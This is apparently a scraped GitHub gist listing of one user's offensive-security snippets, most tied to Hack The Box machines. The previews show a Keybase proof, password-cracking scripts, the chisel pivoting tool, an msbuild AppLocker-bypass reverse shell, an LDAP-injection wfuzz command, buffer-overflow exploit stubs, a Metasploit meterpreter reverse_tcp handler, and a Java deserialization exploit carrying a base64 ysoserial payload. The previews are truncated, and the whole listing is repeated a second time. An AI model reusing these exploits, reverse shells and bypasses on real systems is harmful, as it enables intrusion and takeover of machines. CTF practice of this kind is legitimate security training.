dualfade

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                dualfade
                / keybase.md
            
            
              Created
              September 7, 2018 18:02
            
          
    Keybase proof

I hereby claim:

I am cdowns71 on github.
I am dualfade (https://keybase.io/dualfade) on keybase.
I have a public key ASDxw8oJN09Hj6abWb9Vc-BggpenCuRcRRWNa3j1r04UQwo

To claim this, I am signing this object:

  
## gist:41ea28b014a4375740af326ee5ad41ba
https://gist.githubusercontent.com/bcoles/421cc413d07cd9ba7855/raw/fd8b6f0d63f88c334beb45d2615c8097f06743b6/7zip-jtr.sh
#!/bin/bash
# 7zip-JTR Decrypt Script
#
# Clone of JTR Decrypt Scripts by synacl modified for 7zip
# - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/
# - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/

echo "7zip-JTR Decrypt Script";
if [ $# -ne 2 ]

## Chisel_Golang_PivotingUtility
https://github.com/jpillora/chisel

┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master]
└[~/go/src/github.com/jpillora/chisel]> cd $GOPATH/src/github.com/jpillora/chisel
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master]
└[~/go/src/github.com/jpillora/chisel]> go build
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master]
└[~/go/src/github.com/jpillora/chisel]> ls -l chisel
-rwxr-xr-x 1 cdowns cdowns 10539193 Jan 28 04:24 chisel*
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master]

## msbuild.exe msf reverse shell x86
//Applocker bypass - Windows 2016 (Build 14393) x64
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SoiYtuH7.xml
//Microsoft (R) Build Engine version 4.6.1586.0
//[Microsoft .NET Framework, version 4.0.30319.42000]
//Copyright (C) Microsoft Corporation. All rights reserved.

//Build started 2/5/2019 8:55:26 PM.

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->

## WFUZZ_LDAP_Injection.txt
./wfuzz -c -s 1 -z file,/home/cdowns/Documents/Hack_The_Box/CTF/ldap_attributes_all.txt,double,urencode -d 'inputUsername=ldapuser%2529%2528FUZZ%253D%252A&inputOTP=password' --hw 233 -u 'http://10.10.10.122/login.php' -p 127.0.0.1:8080

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.122/login.php
Total requests: 2026

## gist:ca19bf238f04bc568199d23b7b83af65
/home/cdowns/Github/JohnTheRipper/run/./zip2john exploitme.zip > exploitme.john
ver 2.0 efh 5455 efh 7875 exploitme.zip/membermanager PKZIP Encr: 2b chk, TS_chk, cmplen=3166, decmplen=10224, crc=32B64CF9
ver 2.0 efh 5455 efh 7875 exploitme.zip/memo PKZIP Encr: 2b chk, TS_chk, cmplen=3775, decmplen=13304, crc=FC9CDB4F
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

4 CORE OPTINON --
NO POINT IN CRUSHING MY 8 CORES INO THE GROUND --

## gist:1f4aec48c1a48dd8719430989df1d277
#!usr/bin/env python
import struct
from pwn import *

def gen_payload(start_addr, shellcode):
        context.arch='amd64'
        # Opcode for the NOP instruction
        nop = asm('nop', arch="amd64")
        nop1 = nop*72   # Create first NOP sled


## gist:938943cf573471944206e3e53bb5f3e3
#!/usr/bin/env python
from struct import *

# bytes 400 --
buf = ""

# offset to RIP
buf += "A"*72

# overwrite RIP --

## gist:48c45fb47ff273a3996c9a4f10ac9d72
MODIFIED VEIL HANDLER --
msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc

/*
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.13
set LPORT 3434
set ExitOnSession false
exploit -j

## gist:6bab381cc154fa4f1d8744329c786330
import hashlib
import hmac
import base64
import requests

url = 'http://10.10.10.130:8080/userSubscribe.faces'

# re check the payload maybe generate it from kali (ysoserial pipe to base64) and make sure it is java 8 in order for it to work.

payload = 'rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAA3NyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAU3QAJnlzb3Nl
	https://gist.githubusercontent.com/bcoles/421cc413d07cd9ba7855/raw/fd8b6f0d63f88c334beb45d2615c8097f06743b6/7zip-jtr.sh
	#!/bin/bash
	# 7zip-JTR Decrypt Script
	#
	# Clone of JTR Decrypt Scripts by synacl modified for 7zip
	# - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/
	# - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/

	echo "7zip-JTR Decrypt Script";
	if [ $# -ne 2 ]
	https://github.com/jpillora/chisel

	┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master]
	└[~/go/src/github.com/jpillora/chisel]> cd $GOPATH/src/github.com/jpillora/chisel
	┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master]
	└[~/go/src/github.com/jpillora/chisel]> go build
	┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master]
	└[~/go/src/github.com/jpillora/chisel]> ls -l chisel
	-rwxr-xr-x 1 cdowns cdowns 10539193 Jan 28 04:24 chisel*
	┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master]
	//Applocker bypass - Windows 2016 (Build 14393) x64
	//C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SoiYtuH7.xml
	//Microsoft (R) Build Engine version 4.6.1586.0
	//[Microsoft .NET Framework, version 4.0.30319.42000]
	//Copyright (C) Microsoft Corporation. All rights reserved.

	//Build started 2/5/2019 8:55:26 PM.

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
	./wfuzz -c -s 1 -z file,/home/cdowns/Documents/Hack_The_Box/CTF/ldap_attributes_all.txt,double,urencode -d 'inputUsername=ldapuser%2529%2528FUZZ%253D%252A&inputOTP=password' --hw 233 -u 'http://10.10.10.122/login.php' -p 127.0.0.1:8080

	Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

	********************************************************
	* Wfuzz 2.3.4 - The Web Fuzzer *
	********************************************************

	Target: http://10.10.10.122/login.php
	Total requests: 2026
	/home/cdowns/Github/JohnTheRipper/run/./zip2john exploitme.zip > exploitme.john
	ver 2.0 efh 5455 efh 7875 exploitme.zip/membermanager PKZIP Encr: 2b chk, TS_chk, cmplen=3166, decmplen=10224, crc=32B64CF9
	ver 2.0 efh 5455 efh 7875 exploitme.zip/memo PKZIP Encr: 2b chk, TS_chk, cmplen=3775, decmplen=13304, crc=FC9CDB4F
	NOTE: It is assumed that all files in each archive have the same password.
	If that is not the case, the hash may be uncrackable. To avoid this, use
	option -o to pick a file at a time.

	4 CORE OPTINON --
	NO POINT IN CRUSHING MY 8 CORES INO THE GROUND --
	#!usr/bin/env python
	import struct
	from pwn import *

	def gen_payload(start_addr, shellcode):
	context.arch='amd64'
	# Opcode for the NOP instruction
	nop = asm('nop', arch="amd64")
	nop1 = nop*72 # Create first NOP sled
	#!/usr/bin/env python
	from struct import *

	# bytes 400 --
	buf = ""

	# offset to RIP
	buf += "A"*72

	# overwrite RIP --
	MODIFIED VEIL HANDLER --
	msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc

	/*
	use exploit/multi/handler
	set PAYLOAD windows/x64/meterpreter/reverse_tcp
	set LHOST 10.10.14.13
	set LPORT 3434
	set ExitOnSession false
	exploit -j
	import hashlib
	import hmac
	import base64
	import requests

	url = 'http://10.10.10.130:8080/userSubscribe.faces'

	# re check the payload maybe generate it from kali (ysoserial pipe to base64) and make sure it is java 8 in order for it to work.

	payload = 'rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAA3NyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAU3QAJnlzb3Nl